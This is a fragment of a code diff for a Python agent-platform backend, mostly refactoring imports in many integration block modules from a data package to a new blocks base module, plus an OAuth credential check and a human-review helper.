if (oauth_config := provider.oauth_config) and bool(
|
||||||
|
os.getenv(oauth_config.client_id_env_var)
|
||||||
|
and os.getenv(oauth_config.client_secret_env_var)
|
||||||
|
):
|
||||||
|
logger.debug(
|
||||||
|
f"Block {block_cls.__name__} credential input '{field_name}' "
|
||||||
|
f"provider '{provider_name}' is configured for OAuth"
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
logger.error(
|
||||||
|
f"Block {block_cls.__name__} credential input '{field_name}' "
|
||||||
|
f"provider '{provider_name}' "
|
||||||
|
"is missing OAuth client ID or secret - Disabling"
|
||||||
|
)
|
||||||
|
return False
|
||||||
|
|
||||||
|
logger.debug(
|
||||||
|
f"Block {block_cls.__name__} credential input '{field_name}' is valid; "
|
||||||
|
f"supported credential types: {', '.join(field_info.supported_types)}"
|
||||||
|
)
|
||||||
|
|
||||||
|
return True
|
||||||
@@ -1,7 +1,7 @@
|
|||||||
import logging
|
import logging
|
||||||
from typing import Any, Optional
|
from typing import TYPE_CHECKING, Any, Optional
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockInput,
|
BlockInput,
|
||||||
@@ -9,13 +9,15 @@ from backend.data.block import (
|
|||||||
BlockSchema,
|
BlockSchema,
|
||||||
BlockSchemaInput,
|
BlockSchemaInput,
|
||||||
BlockType,
|
BlockType,
|
||||||
get_block,
|
|
||||||
)
|
)
|
||||||
from backend.data.execution import ExecutionContext, ExecutionStatus, NodesInputMasks
|
from backend.data.execution import ExecutionContext, ExecutionStatus, NodesInputMasks
|
||||||
from backend.data.model import NodeExecutionStats, SchemaField
|
from backend.data.model import NodeExecutionStats, SchemaField
|
||||||
from backend.util.json import validate_with_jsonschema
|
from backend.util.json import validate_with_jsonschema
|
||||||
from backend.util.retry import func_retry
|
from backend.util.retry import func_retry
|
||||||
|
|
||||||
|
if TYPE_CHECKING:
|
||||||
|
from backend.executor.utils import LogMetadata
|
||||||
|
|
||||||
_logger = logging.getLogger(__name__)
|
_logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
@@ -124,9 +126,10 @@ class AgentExecutorBlock(Block):
|
|||||||
graph_version: int,
|
graph_version: int,
|
||||||
graph_exec_id: str,
|
graph_exec_id: str,
|
||||||
user_id: str,
|
user_id: str,
|
||||||
logger,
|
logger: "LogMetadata",
|
||||||
) -> BlockOutput:
|
) -> BlockOutput:
|
||||||
|
|
||||||
|
from backend.blocks import get_block
|
||||||
from backend.data.execution import ExecutionEventType
|
from backend.data.execution import ExecutionEventType
|
||||||
from backend.executor import utils as execution_utils
|
from backend.executor import utils as execution_utils
|
||||||
|
|
||||||
@@ -198,7 +201,7 @@ class AgentExecutorBlock(Block):
|
|||||||
self,
|
self,
|
||||||
graph_exec_id: str,
|
graph_exec_id: str,
|
||||||
user_id: str,
|
user_id: str,
|
||||||
logger,
|
logger: "LogMetadata",
|
||||||
) -> None:
|
) -> None:
|
||||||
from backend.executor import utils as execution_utils
|
from backend.executor import utils as execution_utils
|
||||||
|
|
||||||
|
|||||||
@@ -1,5 +1,11 @@
|
|||||||
from typing import Any
|
from typing import Any
|
||||||
|
|
||||||
|
from backend.blocks._base import (
|
||||||
|
BlockCategory,
|
||||||
|
BlockOutput,
|
||||||
|
BlockSchemaInput,
|
||||||
|
BlockSchemaOutput,
|
||||||
|
)
|
||||||
from backend.blocks.llm import (
|
from backend.blocks.llm import (
|
||||||
DEFAULT_LLM_MODEL,
|
DEFAULT_LLM_MODEL,
|
||||||
TEST_CREDENTIALS,
|
TEST_CREDENTIALS,
|
||||||
@@ -11,12 +17,6 @@ from backend.blocks.llm import (
|
|||||||
LLMResponse,
|
LLMResponse,
|
||||||
llm_call,
|
llm_call,
|
||||||
)
|
)
|
||||||
from backend.data.block import (
|
|
||||||
BlockCategory,
|
|
||||||
BlockOutput,
|
|
||||||
BlockSchemaInput,
|
|
||||||
BlockSchemaOutput,
|
|
||||||
)
|
|
||||||
from backend.data.model import APIKeyCredentials, NodeExecutionStats, SchemaField
|
from backend.data.model import APIKeyCredentials, NodeExecutionStats, SchemaField
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -6,7 +6,7 @@ from pydantic import SecretStr
|
|||||||
from replicate.client import Client as ReplicateClient
|
from replicate.client import Client as ReplicateClient
|
||||||
from replicate.helpers import FileOutput
|
from replicate.helpers import FileOutput
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -5,7 +5,12 @@ from pydantic import SecretStr
|
|||||||
from replicate.client import Client as ReplicateClient
|
from replicate.client import Client as ReplicateClient
|
||||||
from replicate.helpers import FileOutput
|
from replicate.helpers import FileOutput
|
||||||
|
|
||||||
from backend.data.block import Block, BlockCategory, BlockSchemaInput, BlockSchemaOutput
|
from backend.blocks._base import (
|
||||||
|
Block,
|
||||||
|
BlockCategory,
|
||||||
|
BlockSchemaInput,
|
||||||
|
BlockSchemaOutput,
|
||||||
|
)
|
||||||
from backend.data.execution import ExecutionContext
|
from backend.data.execution import ExecutionContext
|
||||||
from backend.data.model import (
|
from backend.data.model import (
|
||||||
APIKeyCredentials,
|
APIKeyCredentials,
|
||||||
|
|||||||
@@ -6,7 +6,7 @@ from typing import Literal
|
|||||||
from pydantic import SecretStr
|
from pydantic import SecretStr
|
||||||
from replicate.client import Client as ReplicateClient
|
from replicate.client import Client as ReplicateClient
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -6,7 +6,7 @@ from typing import Literal
|
|||||||
|
|
||||||
from pydantic import SecretStr
|
from pydantic import SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,3 +1,10 @@
|
|||||||
|
from backend.blocks._base import (
|
||||||
|
Block,
|
||||||
|
BlockCategory,
|
||||||
|
BlockOutput,
|
||||||
|
BlockSchemaInput,
|
||||||
|
BlockSchemaOutput,
|
||||||
|
)
|
||||||
from backend.blocks.apollo._api import ApolloClient
|
from backend.blocks.apollo._api import ApolloClient
|
||||||
from backend.blocks.apollo._auth import (
|
from backend.blocks.apollo._auth import (
|
||||||
TEST_CREDENTIALS,
|
TEST_CREDENTIALS,
|
||||||
@@ -10,13 +17,6 @@ from backend.blocks.apollo.models import (
|
|||||||
PrimaryPhone,
|
PrimaryPhone,
|
||||||
SearchOrganizationsRequest,
|
SearchOrganizationsRequest,
|
||||||
)
|
)
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
|
||||||
BlockCategory,
|
|
||||||
BlockOutput,
|
|
||||||
BlockSchemaInput,
|
|
||||||
BlockSchemaOutput,
|
|
||||||
)
|
|
||||||
from backend.data.model import CredentialsField, SchemaField
|
from backend.data.model import CredentialsField, SchemaField
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -1,5 +1,12 @@
|
|||||||
import asyncio
|
import asyncio
|
||||||
|
|
||||||
|
from backend.blocks._base import (
|
||||||
|
Block,
|
||||||
|
BlockCategory,
|
||||||
|
BlockOutput,
|
||||||
|
BlockSchemaInput,
|
||||||
|
BlockSchemaOutput,
|
||||||
|
)
|
||||||
from backend.blocks.apollo._api import ApolloClient
|
from backend.blocks.apollo._api import ApolloClient
|
||||||
from backend.blocks.apollo._auth import (
|
from backend.blocks.apollo._auth import (
|
||||||
TEST_CREDENTIALS,
|
TEST_CREDENTIALS,
|
||||||
@@ -14,13 +21,6 @@ from backend.blocks.apollo.models import (
|
|||||||
SearchPeopleRequest,
|
SearchPeopleRequest,
|
||||||
SenorityLevels,
|
SenorityLevels,
|
||||||
)
|
)
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
|
||||||
BlockCategory,
|
|
||||||
BlockOutput,
|
|
||||||
BlockSchemaInput,
|
|
||||||
BlockSchemaOutput,
|
|
||||||
)
|
|
||||||
from backend.data.model import CredentialsField, SchemaField
|
from backend.data.model import CredentialsField, SchemaField
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -1,3 +1,10 @@
|
|||||||
|
from backend.blocks._base import (
|
||||||
|
Block,
|
||||||
|
BlockCategory,
|
||||||
|
BlockOutput,
|
||||||
|
BlockSchemaInput,
|
||||||
|
BlockSchemaOutput,
|
||||||
|
)
|
||||||
from backend.blocks.apollo._api import ApolloClient
|
from backend.blocks.apollo._api import ApolloClient
|
||||||
from backend.blocks.apollo._auth import (
|
from backend.blocks.apollo._auth import (
|
||||||
TEST_CREDENTIALS,
|
TEST_CREDENTIALS,
|
||||||
@@ -6,13 +13,6 @@ from backend.blocks.apollo._auth import (
|
|||||||
ApolloCredentialsInput,
|
ApolloCredentialsInput,
|
||||||
)
|
)
|
||||||
from backend.blocks.apollo.models import Contact, EnrichPersonRequest
|
from backend.blocks.apollo.models import Contact, EnrichPersonRequest
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
|
||||||
BlockCategory,
|
|
||||||
BlockOutput,
|
|
||||||
BlockSchemaInput,
|
|
||||||
BlockSchemaOutput,
|
|
||||||
)
|
|
||||||
from backend.data.model import CredentialsField, SchemaField
|
from backend.data.model import CredentialsField, SchemaField
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -3,7 +3,7 @@ from typing import Optional
|
|||||||
|
|
||||||
from pydantic import BaseModel, Field
|
from pydantic import BaseModel, Field
|
||||||
|
|
||||||
from backend.data.block import BlockSchemaInput
|
from backend.blocks._base import BlockSchemaInput
|
||||||
from backend.data.model import SchemaField, UserIntegrations
|
from backend.data.model import SchemaField, UserIntegrations
|
||||||
from backend.integrations.ayrshare import AyrshareClient
|
from backend.integrations.ayrshare import AyrshareClient
|
||||||
from backend.util.clients import get_database_manager_async_client
|
from backend.util.clients import get_database_manager_async_client
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
import enum
|
import enum
|
||||||
from typing import Any
|
from typing import Any
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -2,7 +2,7 @@ import os
|
|||||||
import re
|
import re
|
||||||
from typing import Type
|
from typing import Type
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
from enum import Enum
|
from enum import Enum
|
||||||
from typing import Any
|
from typing import Any
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -6,7 +6,7 @@ from typing import Literal, Optional
|
|||||||
from e2b import AsyncSandbox as BaseAsyncSandbox
|
from e2b import AsyncSandbox as BaseAsyncSandbox
|
||||||
from pydantic import BaseModel, SecretStr
|
from pydantic import BaseModel, SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -6,7 +6,7 @@ from e2b_code_interpreter import Result as E2BExecutionResult
|
|||||||
from e2b_code_interpreter.charts import Chart as E2BExecutionResultChart
|
from e2b_code_interpreter.charts import Chart as E2BExecutionResultChart
|
||||||
from pydantic import BaseModel, Field, JsonValue, SecretStr
|
from pydantic import BaseModel, Field, JsonValue, SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
import re
|
import re
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -6,7 +6,7 @@ from openai import AsyncOpenAI
|
|||||||
from openai.types.responses import Response as OpenAIResponse
|
from openai.types.responses import Response as OpenAIResponse
|
||||||
from pydantic import SecretStr
|
from pydantic import SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
from pydantic import BaseModel
|
from pydantic import BaseModel
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockManualWebhookConfig,
|
BlockManualWebhookConfig,
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
from typing import Any, List
|
from typing import Any, List
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
import codecs
|
import codecs
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -8,7 +8,7 @@ from typing import Any, Literal, cast
|
|||||||
import discord
|
import discord
|
||||||
from pydantic import SecretStr
|
from pydantic import SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -2,7 +2,7 @@
|
|||||||
Discord OAuth-based blocks.
|
Discord OAuth-based blocks.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -7,7 +7,7 @@ from typing import Literal
|
|||||||
|
|
||||||
from pydantic import BaseModel, ConfigDict, SecretStr
|
from pydantic import BaseModel, ConfigDict, SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -2,7 +2,7 @@
|
|||||||
|
|
||||||
import codecs
|
import codecs
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -8,7 +8,7 @@ which provides access to LinkedIn profile data and related information.
|
|||||||
import logging
|
import logging
|
||||||
from typing import Optional
|
from typing import Optional
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -3,6 +3,13 @@ import logging
|
|||||||
from enum import Enum
|
from enum import Enum
|
||||||
from typing import Any
|
from typing import Any
|
||||||
|
|
||||||
|
from backend.blocks._base import (
|
||||||
|
Block,
|
||||||
|
BlockCategory,
|
||||||
|
BlockOutput,
|
||||||
|
BlockSchemaInput,
|
||||||
|
BlockSchemaOutput,
|
||||||
|
)
|
||||||
from backend.blocks.fal._auth import (
|
from backend.blocks.fal._auth import (
|
||||||
TEST_CREDENTIALS,
|
TEST_CREDENTIALS,
|
||||||
TEST_CREDENTIALS_INPUT,
|
TEST_CREDENTIALS_INPUT,
|
||||||
@@ -10,13 +17,6 @@ from backend.blocks.fal._auth import (
|
|||||||
FalCredentialsField,
|
FalCredentialsField,
|
||||||
FalCredentialsInput,
|
FalCredentialsInput,
|
||||||
)
|
)
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
|
||||||
BlockCategory,
|
|
||||||
BlockOutput,
|
|
||||||
BlockSchemaInput,
|
|
||||||
BlockSchemaOutput,
|
|
||||||
)
|
|
||||||
from backend.data.execution import ExecutionContext
|
from backend.data.execution import ExecutionContext
|
||||||
from backend.data.model import SchemaField
|
from backend.data.model import SchemaField
|
||||||
from backend.util.file import store_media_file
|
from backend.util.file import store_media_file
|
||||||
|
|||||||
@@ -5,7 +5,7 @@ from pydantic import SecretStr
|
|||||||
from replicate.client import Client as ReplicateClient
|
from replicate.client import Client as ReplicateClient
|
||||||
from replicate.helpers import FileOutput
|
from replicate.helpers import FileOutput
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -3,7 +3,7 @@ from typing import Optional
|
|||||||
|
|
||||||
from pydantic import BaseModel
|
from pydantic import BaseModel
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -5,7 +5,7 @@ from typing import Optional
|
|||||||
|
|
||||||
from typing_extensions import TypedDict
|
from typing_extensions import TypedDict
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -3,7 +3,7 @@ from urllib.parse import urlparse
|
|||||||
|
|
||||||
from typing_extensions import TypedDict
|
from typing_extensions import TypedDict
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -2,7 +2,7 @@ import re
|
|||||||
|
|
||||||
from typing_extensions import TypedDict
|
from typing_extensions import TypedDict
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -2,7 +2,7 @@ import base64
|
|||||||
|
|
||||||
from typing_extensions import TypedDict
|
from typing_extensions import TypedDict
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -4,7 +4,7 @@ from typing import Any, List, Optional
|
|||||||
|
|
||||||
from typing_extensions import TypedDict
|
from typing_extensions import TypedDict
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -3,7 +3,7 @@ from typing import Optional
|
|||||||
|
|
||||||
from pydantic import BaseModel
|
from pydantic import BaseModel
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -4,7 +4,7 @@ from pathlib import Path
|
|||||||
|
|
||||||
from pydantic import BaseModel
|
from pydantic import BaseModel
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -8,7 +8,7 @@ from google.oauth2.credentials import Credentials
|
|||||||
from googleapiclient.discovery import build
|
from googleapiclient.discovery import build
|
||||||
from pydantic import BaseModel
|
from pydantic import BaseModel
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -7,14 +7,14 @@ from google.oauth2.credentials import Credentials
|
|||||||
from googleapiclient.discovery import build
|
from googleapiclient.discovery import build
|
||||||
from gravitas_md2gdocs import to_requests
|
from gravitas_md2gdocs import to_requests
|
||||||
|
|
||||||
from backend.blocks.google._drive import GoogleDriveFile, GoogleDriveFileField
|
from backend.blocks._base import (
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
BlockSchemaInput,
|
BlockSchemaInput,
|
||||||
BlockSchemaOutput,
|
BlockSchemaOutput,
|
||||||
)
|
)
|
||||||
|
from backend.blocks.google._drive import GoogleDriveFile, GoogleDriveFileField
|
||||||
from backend.data.model import SchemaField
|
from backend.data.model import SchemaField
|
||||||
from backend.util.settings import Settings
|
from backend.util.settings import Settings
|
||||||
|
|
||||||
|
|||||||
@@ -14,7 +14,7 @@ from google.oauth2.credentials import Credentials
|
|||||||
from googleapiclient.discovery import build
|
from googleapiclient.discovery import build
|
||||||
from pydantic import BaseModel, Field
|
from pydantic import BaseModel, Field
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -7,14 +7,14 @@ from enum import Enum
|
|||||||
from google.oauth2.credentials import Credentials
|
from google.oauth2.credentials import Credentials
|
||||||
from googleapiclient.discovery import build
|
from googleapiclient.discovery import build
|
||||||
|
|
||||||
from backend.blocks.google._drive import GoogleDriveFile, GoogleDriveFileField
|
from backend.blocks._base import (
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
BlockSchemaInput,
|
BlockSchemaInput,
|
||||||
BlockSchemaOutput,
|
BlockSchemaOutput,
|
||||||
)
|
)
|
||||||
|
from backend.blocks.google._drive import GoogleDriveFile, GoogleDriveFileField
|
||||||
from backend.data.model import SchemaField
|
from backend.data.model import SchemaField
|
||||||
from backend.util.settings import Settings
|
from backend.util.settings import Settings
|
||||||
|
|
||||||
|
|||||||
@@ -3,7 +3,7 @@ from typing import Literal
|
|||||||
import googlemaps
|
import googlemaps
|
||||||
from pydantic import BaseModel, SecretStr
|
from pydantic import BaseModel, SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -9,9 +9,7 @@ from typing import Any, Optional
|
|||||||
from prisma.enums import ReviewStatus
|
from prisma.enums import ReviewStatus
|
||||||
from pydantic import BaseModel
|
from pydantic import BaseModel
|
||||||
|
|
||||||
from backend.data.execution import ExecutionStatus
|
|
||||||
from backend.data.human_review import ReviewResult
|
from backend.data.human_review import ReviewResult
|
||||||
from backend.executor.manager import async_update_node_execution_status
|
|
||||||
from backend.util.clients import get_database_manager_async_client
|
from backend.util.clients import get_database_manager_async_client
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
@@ -43,6 +41,8 @@ class HITLReviewHelper:
|
|||||||
@staticmethod
|
@staticmethod
|
||||||
async def update_node_execution_status(**kwargs) -> None:
|
async def update_node_execution_status(**kwargs) -> None:
|
||||||
"""Update the execution status of a node."""
|
"""Update the execution status of a node."""
|
||||||
|
from backend.executor.manager import async_update_node_execution_status
|
||||||
|
|
||||||
await async_update_node_execution_status(
|
await async_update_node_execution_status(
|
||||||
db_client=get_database_manager_async_client(), **kwargs
|
db_client=get_database_manager_async_client(), **kwargs
|
||||||
)
|
)
|
||||||
@@ -88,12 +88,13 @@ class HITLReviewHelper:
|
|||||||
Raises:
|
Raises:
|
||||||
Exception: If review creation or status update fails
|
Exception: If review creation or status update fails
|
||||||
"""
|
"""
|
||||||
|
from backend.data.execution import ExecutionStatus
|
||||||
|
|
||||||
# Note: Safe mode checks (human_in_the_loop_safe_mode, sensitive_action_safe_mode)
|
# Note: Safe mode checks (human_in_the_loop_safe_mode, sensitive_action_safe_mode)
|
||||||
# are handled by the caller:
|
# are handled by the caller:
|
||||||
# - HITL blocks check human_in_the_loop_safe_mode in their run() method
|
# - HITL blocks check human_in_the_loop_safe_mode in their run() method
|
||||||
# - Sensitive action blocks check sensitive_action_safe_mode in is_block_exec_need_review()
|
# - Sensitive action blocks check sensitive_action_safe_mode in is_block_exec_need_review()
|
||||||
# This function only handles checking for existing approvals.
|
# This function only handles checking for existing approvals.
|
||||||
|
|
||||||
# Check if this node has already been approved (normal or auto-approval)
|
# Check if this node has already been approved (normal or auto-approval)
|
||||||
if approval_result := await HITLReviewHelper.check_approval(
|
if approval_result := await HITLReviewHelper.check_approval(
|
||||||
node_exec_id=node_exec_id,
|
node_exec_id=node_exec_id,
|
||||||
|
|||||||
@@ -8,7 +8,7 @@ from typing import Literal
|
|||||||
import aiofiles
|
import aiofiles
|
||||||
from pydantic import SecretStr
|
from pydantic import SecretStr
|
||||||
|
|
||||||
from backend.data.block import (
|
from backend.blocks._base import (
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
|
|||||||
@@ -1,15 +1,15 @@
|
|||||||
from backend.blocks.hubspot._auth import (
|
from backend.blocks._base import (
|
||||||
HubSpotCredentials,
|
|
||||||
HubSpotCredentialsField,
|
|
||||||
HubSpotCredentialsInput,
|
|
||||||
)
|
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
BlockSchemaInput,
|
BlockSchemaInput,
|
||||||
BlockSchemaOutput,
|
BlockSchemaOutput,
|
||||||
)
|
)
|
||||||
|
from backend.blocks.hubspot._auth import (
|
||||||
|
HubSpotCredentials,
|
||||||
|
HubSpotCredentialsField,
|
||||||
|
HubSpotCredentialsInput,
|
||||||
|
)
|
||||||
from backend.data.model import SchemaField
|
from backend.data.model import SchemaField
|
||||||
from backend.util.request import Requests
|
from backend.util.request import Requests
|
||||||
|
|
||||||
|
|||||||
@@ -1,15 +1,15 @@
|
|||||||
from backend.blocks.hubspot._auth import (
|
from backend.blocks._base import (
|
||||||
HubSpotCredentials,
|
|
||||||
HubSpotCredentialsField,
|
|
||||||
HubSpotCredentialsInput,
|
|
||||||
)
|
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
BlockSchemaInput,
|
BlockSchemaInput,
|
||||||
BlockSchemaOutput,
|
BlockSchemaOutput,
|
||||||
)
|
)
|
||||||
|
from backend.blocks.hubspot._auth import (
|
||||||
|
HubSpotCredentials,
|
||||||
|
HubSpotCredentialsField,
|
||||||
|
HubSpotCredentialsInput,
|
||||||
|
)
|
||||||
from backend.data.model import SchemaField
|
from backend.data.model import SchemaField
|
||||||
from backend.util.request import Requests
|
from backend.util.request import Requests
|
||||||
|
|
||||||
|
|||||||
@@ -1,17 +1,17 @@
|
|||||||
from datetime import datetime, timedelta
|
from datetime import datetime, timedelta
|
||||||
|
|
||||||
from backend.blocks.hubspot._auth import (
|
from backend.blocks._base import (
|
||||||
HubSpotCredentials,
|
|
||||||
HubSpotCredentialsField,
|
|
||||||
HubSpotCredentialsInput,
|
|
||||||
)
|
|
||||||
from backend.data.block import (
|
|
||||||
Block,
|
Block,
|
||||||
BlockCategory,
|
BlockCategory,
|
||||||
BlockOutput,
|
BlockOutput,
|
||||||
BlockSchemaInput,
|
BlockSchemaInput,
|
||||||
BlockSchemaOutput,
|
BlockSchemaOutput,
|
||||||
)
|
)
|
||||||
|
from backend.blocks.hubspot._auth import (
|
||||||
|
HubSpotCredentials,
|
||||||
|
HubSpotCredentialsField,
|
||||||
|
HubSpotCredentialsInput,
|
||||||
|
)
|
||||||
from backend.data.model import SchemaField
|
from backend.data.model import SchemaField
|
||||||
from backend.util.request import Requests
|
from backend.util.request import Requests
|
||||||
|
|
||||||
|
|||||||
@@ -3,8 +3,7 @@ from typing import Any
|
|||||||
|
|
||||||
from prisma.enums import ReviewStatus
|
from prisma.enums import ReviewStatus
|
||||||
|
|
||||||
from backend.blocks.helpers.review import HITLReviewHelper
|
